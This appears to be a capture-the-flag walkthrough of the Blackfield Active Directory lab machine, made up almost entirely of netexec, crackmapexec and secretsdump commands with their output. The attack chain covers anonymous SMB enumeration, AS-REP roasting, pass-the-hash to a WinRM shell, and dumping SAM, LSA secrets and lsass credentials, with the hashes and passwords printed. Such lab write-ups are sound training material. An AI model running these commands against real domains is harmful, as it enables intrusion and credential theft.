Support:
- Getting domain info
netexec smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
- Anonymous logon
netexec smb 10.10.10.192 -u 'anonymous' -p ''
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
- Getting shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share
- Getting list of files in shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/nxc_spider_plus
# no readable files, we miss all the username
cat /tmp/nxc_spider_plus/10.10.10.192.json
{
"profiles$": {}
}
- AS-REP Roast
netexec ldap 10.10.10.192 -u /tmp/wordlist -p '' --asreproast /tmp/kerberos.txt --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [email protected]:463841df869d5191fb527e7da2d7c1f3$63f60bc12dbf5e1244dadc984314b3fd513918c051e81e50943758de0fdb83d3f1ee51ede148bea256141d8c804de71fa88d17f03ec669fa1593652fc9363f81ac3cb735e0271a0a4569fe6094879e24abeb710cfd7844670d062967b46808242ea98b0868b53d7c818eddf27c2d7864c9c8dd1db8a938824c2614d53ee1d304390547cd019ca32a14aec5cd785255ed9fba039fea9e4652cfa277cc71c9796da94c3d3f346407b06db9db96e702e0061da735650c6c12e387ec67635662770f0309ea8a13fdb281c2f5b8c041795d0b763837a85ec8c5f6d2951b1d9b094575845fae5638148a41884b3e3b7aaa5acc6883ce62
- Access check
netexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight
netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
- Kerberoasting
netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kerberoasting /tmp/kerbe --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 [-] No entries found!
- Shell as svc_backup
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
crackmapexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/nxc_spider_plus
grep "memo" /tmp/nxc_spider_plus/10.10.10.192.json
"memory_analysis/RuntimeBroker.zip": {
"memory_analysis/ServerManager.zip": {
"memory_analysis/WmiPrvSE.zip": {
"memory_analysis/conhost.zip": {
"memory_analysis/ctfmon.zip": {
"memory_analysis/dfsrs.zip": {
"memory_analysis/dllhost.zip": {
"memory_analysis/ismserv.zip": {
"memory_analysis/lsass.zip": {
"memory_analysis/mmc.zip": {
"memory_analysis/sihost.zip": {
"memory_analysis/smartscreen.zip": {
"memory_analysis/svchost.zip": {
"memory_analysis/taskhostw.zip": {
"memory_analysis/winlogon.zip": {
"memory_analysis/wlms.zip": {
"tools/sleuthkit-4.8.0-win32/bin/api-ms-win-core-memory-l1-1-0.dll": {
# Go get the lsassy using smbclient or dump everything using cme
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus -o READ_ONLY=false
- Shell over WinRM
netexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup 9658d1d1dcd9250115e2205d9f48400d
netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -x 'whoami;hostname'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
WINRM 10.10.10.192 5985 DC01 [+] Executed command
WINRM 10.10.10.192 5985 DC01 blackfield\svc_backup
DC01
- For fun and profit
sam
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --sam
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping SAM hashes
SMB 10.10.10.192 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
SMB 10.10.10.192 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.192 445 DC01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lsa
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --lsa
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping LSA secrets
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aes256-cts-hmac-sha1-96:9a1cbed11eac98cd2382509615cafd99f9ead2cc2e48352e269d5a05d50652bd
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aes128-cts-hmac-sha1-96:6e4e93262b357cf298c60538d6373f26
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:des-cbc-md5:45d6dacdd57a07df
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
SMB 10.10.10.192 445 DC01 BLACKFIELD\Administrator:###_ADM1N_3920_###
SMB 10.10.10.192 445 DC01 dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
SMB 10.10.10.192 445 DC01 NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f
lsass
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee -M lsassy
[-] Failed loading module at /usr/local/lib/python3.7/dist-packages/crackmapexec-5.1.0.dev0-py3.7.egg/cme/modules/slinky.py: No module named 'pylnk3'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
LSASSY 10.10.10.192 445 DC01 BLACKFIELD\Administrator 184fb5e5178480be64824d4cd53b99ee
LSASSY 10.10.10.192 445 DC01 BLACKFIELD.local\Administrator ###_ADM1N_3920_###
ntds
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --ntds
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.192 445 DC01 [-] Could not connect: timed out
# i'm not the only one, puifff
secretsdump.py administrator:###_ADM1N_3920_###@10.10.10.192 -just-dc
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Enjoy netexec, make sure you have the latest version !
Bye, @mpgn_x64